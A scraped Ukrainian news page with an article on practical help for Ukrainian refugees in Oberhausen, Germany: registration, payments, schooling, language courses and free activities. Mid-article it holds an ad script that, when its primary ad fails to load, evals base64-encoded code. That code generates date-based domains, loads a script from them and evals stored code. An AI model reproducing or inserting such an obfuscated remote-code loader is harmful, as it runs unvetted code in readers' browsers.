Важные новости
«Запорожгаз» — плевать на всех и армейские методы.Оголошено вирок громадянину України, який добровільно вступив до лав незаконного…У Запорізькій області загинув журналіст і бойовий медикМешканця окупованого Бердянська засудили за українську символіку у соцмережахСтрастная неделя 2024 года: значение каждого дня, история, традицииУ Запоріжжі створили освітній осередок на базі однієї з дитячих…Напередодні Великодня у Запоріжжі посилять безпекові заходи з метою недопущення ворожих провокаційУ Запоріжжі багатодітні родини можуть отримати матеріальну допомогуЗа фото у соцмережах окупанти арештували мешканця тимчасово окупованого БердянськаУ Запорізькій області окупанти намагаються впроваджувати обмеження на роботу для…В Запоріжжі проходить реставрація старожитностей, евакуйованих з прифронтового Гуляйполя

Як живуть українські біженці в Німеччині: допомога, умови, мова

Чимало українців у такий скрутний час виїжджають за кордон, щоб знайти тимчасовий прихисток. Важливо знати, де і як зараз можна отримати допомогу.

У нашого міста є партнери у різних куточках світу, які в час війни створили комфортні умови для біженців. Місто Оберхаузен в Німеччині вже більш ніж 30 років підтримує дружні відносини з Запоріжжям. Зараз на його території проживає 2238 українських біженців. Таку інформацію надає офіційний сайт міста у розділі про допомогу Україні.

Що ж чекає на запоріжців зразу після прибуття до Німеччини?

Українські біженці, які прибули до Оберхаузена, мають відвідати будівлю за адресою Knappenstraße 125. Вона працює щодня з 9:00 до 18:00. Тут відбувається перша реєстрація та перевірка стану здоров’я (наприклад, тест на коронавірус), а потім розміщення в одному з доступних місць проживання. В тимчасових притулках волонтери перший час повністю забезпечують людей найнеобхіднішим: їжа та напої, одяг, засоби гігієни.

Після реєстрації українці будуть отримувати щомісячні виплати й зможуть забезпечувати свої потреби самостійно.

Реєстрація та грошові виплати

Щоб зареєструватися і отримати відповіді на всі свої запитання треба відвідати соціальну службу за адресою Essener Straße 58. Окрім загальних питань, тут обговорюються та роз’яснюються поради імміграційних органів, соціально-педагогічні пропозиції, питання охорони здоров’я, проживання та житлової площі.

Після цього громадянам України мають бути виданий перший чек на певну суму коштів, яка залежить від кількості членів родини, місця проживання, наявності роботи. Досі біженці отримували соціальну допомогу на підставі закону про шукачів притулку, яка становила, залежно від місця перебування, трохи більше ніж 300 євро на місяць для дорослої людини і менше для неповнолітніх дітей. Починаючи з 1 червня українці отримуватимуть соціальну допомогу, яку отримують німецькі безробітні. Базова ставка допомоги для дорослого становить 449 євро.

Щодо документів достатньо паспорту і не обов’язково закордонного, для неповнолітньої дитини має бути свідоцтво про народження. Якщо ви плануєте залишитися на тривалий час, отримати роботу і житло, відкрити рахунок в банку, тоді треба відвідати міграційну службу (Bahnhofstraße 66). Тут можна отримати тимчасовий документ, який затверджує вашу особистість, а згодом і пластиковий паспорт.

Навчання для дітей і курси німецької мови

Чимало шкіл зараз готові прийняти до своїх лав дітей з України. В деяких навчальних закладах є спеціальні інтернаціональні класи, які допомагають дітям інтегруватися в навчання і соціум. Однією з таких закладів є гімназія Берти Фон Зутнер, яка співпрацює з Запорізькою гімназією №46 вже багато років. Щорічно ці дві школи проводять обмін учнями та дають змогу дітям поглиблено вивчати мови і культуру країн.

Що стосується мовних курсів для дорослих, можна звернутися до соціальної служби і поставити їм це запитання. Однією з пропозицій є центр освіти для дорослих на Langemarkstraße 19-21, який дедалі частіше пропонує інтеграційні курси, починаючи з середини травня та початку червня 2022 року.

var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Гуманітарна допомога

Місто також намагається допомогти людям речами. Для цього створені пункти гуманітарної допомоги, де можна знайти починаючи від одягу, закінчуючи підгузками для немовлят. Один з таких пунктів знаходиться за адресою Friedrich-Karl Straße 4.

Щовівторка на Gustavstraße 54 з 11:30 до 14 українці можуть отримати їжу. З собою треба брати паспорт та 2 євро. Біженцям дають овочі та фрукти, м’ясо, ковбасу, хліб, молочні продукти тощо.

Безкоштовні розваги для українців

1) Щоб відволікти людей та подарувати їм радість, яку вони втратили, Оберхаузен та інші міста мають багато цікавих пропозицій. Наприклад, галерея «LUDWIGGALERIE Schloss Oberhausen» пропонує подивитися виставку «Фотограф серед музикантів – Лінда Маккартні – шістдесяті» тощо.

LUDWIGGALERIE Schloss Oberhausen пропонує людям, які виїхали з України, можливість ознайомитися з експонатами .

Записи, о 15:00 в такі дні:

12.06.202214.08.202204.09.202207.10.2022

2) Також українцям пропонують безкоштовні бібліотечні картки, які передбачають надання аналогових і цифрових носіїв.

3) Океанаріум «Sea Life» дає можливість біженцям з України поглинутися у підводне життя, на руках треба мати лише паспорт та сертифікат про вакцинацію.

4) Також кафе «RUHRWERKSTATT» на Akazienstraße 103 запрошує українців провести час безкоштовно з напоями та тістечками. У приємній атмосфері можна на кілька годин відволіктися від викликів повсякденності та поспілкуватися з іншими людьми. У кафе спеціалісти готові проконсультувати людей у разі потреби. Заклад надає послуги перекладача для зручності. Зустрічі відбуваються щовівторка з 14 до 17 години.

Кулагіна Крістіна
(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/yak-zhivut-ukrayinski-bizhentsi-v-nimechchini-dopomoga-umovi-mova/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top